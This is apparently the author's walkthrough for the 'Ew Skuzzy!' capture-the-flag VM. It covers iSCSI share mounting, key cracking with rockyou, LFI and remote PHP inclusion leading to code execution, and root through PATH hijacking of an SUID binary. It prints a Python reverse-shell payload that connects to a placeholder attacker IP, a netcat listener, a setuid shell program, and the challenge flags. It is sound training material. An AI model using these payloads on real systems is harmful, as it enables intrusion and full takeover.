Quick Walkthrough for Ew Skuzzy!
- Boot the VM, on virtualbox. IP Address assigned via DHCP will be displayed on the login screen in the vm display.
- Scan the IP with Nmap. 3 ports visible.
- ssh
- http
- iscsi
- Skip SSH the VM has accounts which work with passwords, but I guarantee the passwords are NOT brute-forceable in shorter time than the designed path-to-root :).
- Scan the HTTP Server with 'dirb' and 'common.txt', and enjoy what you find.
- Direct all hate to /dev/null, I'm just messing with you :p
- Realise the name of the VM is a pointer to the path :)
- Kali needs to have iscsiadm tools installed
- apt install open-iscsi
- Scan the iscsi server:
- iscsiadm -m discovery -t st -p IP:3260
- Discover iscsi share:
- IP:3260,1 iqn.2017-02.local.skuzzy:storage.sys0
- Mount iSCSI share:
- iscsiadm -m node -p IP -l --target iqn.2017-02.local.skuzzy:storage.sys0
- Check disk is available
- fdisk -l
- Make a mountpoint
- mkdir /media/iscsi
- Mount the disk:
- mount /dev/sdb /media/iscsi
- Browse to the disk:
- cd /media/iscsi
- Find flag 1!
- flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}
- Make another mount point:
- mkdir /media/bobsdisk
- Mount the disk image:
- mount /media/iscsi/bobsdisk.dsk /media/bobsdisk
- Read the file:
- cat /media/bobsdisk/ToAlice.eml
- Discover flag2, and clues to decrypt ToAlice.csv.enc
- flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}
- Decrypt ToAlice.csv.enc
- 256 bit key
- Pull all 256 bit strings (32 bytes) from rockyou.txt
- cat rockyou.txt| awk 'length($1) == 32' > 32char_strings.txt
- Check each one with a script.
- password: supercalifragilisticoespialidoso
- openssl aes-256-cbc -d -k password -in ToAlice.csv.enc -out ToAlice.csv -md sha256
- View contents of file:
- cat ToAlice.csv
- URLs point to directories on the http server
- http://IP/5560a1468022758dba5e92ac8f2353c0 - Interesting site, no flags.
- http://IP/c2444910794e037ebd8aaf257178c90b - The intended application with method of entry
- Find Flag 3
- flag3{2cce194f49c6e423967b7f72316f48c5caf46e84}
- Access vulnerable PHP application
- Note there are two vulnerabilities which are required to be exploited for shell, LFI and PHP Misconfiguration.
- Access 'flag' link.
- Rage because there is no flag in the page or the source.
- Use LFI Vulnerability to access flag content:
- Decode content provided in page to get actual flag:
- echo "base64content" | base64 -d -
- flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
- Flag IS NEEDED for the next step of the challenge.
- To get shell:
- Access "Feed Reader" link.
- Select "Load Feed" link.
- Note the format of the URL parameters.
- Using the LFI vulnerability above, view the source of the reader.php
- View the source of the page being loaded, and note the tags used to denote php
- ##php##
- reader.php requires a key when loading from another server
- The parameter is a URL parameter 'key'.
- Access the URL with the parameter key specified
- attackscript.txt contains PHP, to generate a reverse shell:
- Example shell:
print("See? RCE!");
exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKERIP\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'");
- Start NC:
- nc -vlp 443
- Catch shell!
- To get root:
- suid binary in /opt
- create script or binary to be executed
- Code, shell.c
int main(void) {
setgid(0);
setuid(0);
execl("/bin/sh","sh",(char*)0);
}
- Compile, output to 'scp' binary
- gcc -o scp shell.c
- Copy to /tmp
- Set path:
- export PATH=/tmp:$PATH
- Set Permissions
- chmod a+x /tmp/scp
- Get root!
- /opt/alicebackup
- Final flag is in /root
DONE!
Thanks for playing - very interested in hearing feedback!